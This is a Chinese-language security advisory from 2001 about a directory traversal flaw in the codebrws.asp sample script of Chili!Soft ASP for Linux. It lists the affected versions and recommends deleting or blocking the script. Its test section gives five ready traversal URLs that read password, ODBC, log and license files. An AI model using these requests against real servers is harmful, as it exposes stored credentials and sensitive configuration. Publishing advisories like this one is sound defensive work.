Chili!Soft ASP 例子脚本目录遍历漏洞
发布日期:2001-03-01
更新日期:2001-03-01
受影响系统:
Chilisoft ChiliSoft ASP for Linux 3.5.2
ChiliSoft ChiliSoft ASP for Linux 3.5
ChiliSoft ChiliSoft ASP for Linux 3.0
描述:
BUGTRAQ ID: 2407
Chili!Soft ASP 提供一个名为 codebrws.asp 的例子脚本,它缺省位于 /opt/casp/caspsamp
目录。这个脚本存在的漏洞使得攻击者可以遍历目录。
通过向有漏洞的脚本提交包含 '/../' 序列的请求。远程攻击者可以强迫脚本读取并显示普通目
录树之外的文件的内容。这将使得攻击者可以读取 /opt/casp 目录中的文件,包括存有诸如数
据库的用户名和口令、服务日志、管理界面的用户名和口令等敏感信息的文件。
<* 来源:Stan Bubrouski (
stan@ccs.neu.edu) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
在浏览器中输入如下形式的 URL:
http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../admin/conf/service.pwd
http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../global_odbc.ini
http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../admin/logs/server
http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../LICENSE.LIC
http://<server>/caspsamp/codebrws.asp?source=/caspsamp/../logs/server-3000
建议:
临时解决办法:
NSFOCUS建议用某种方法拒绝对 codebrws.asp 的请求,或者除非非要用它,干脆删除这
个脚本。
厂商补丁:
暂无
浏览次数:5501
严重程度:0(网友投票)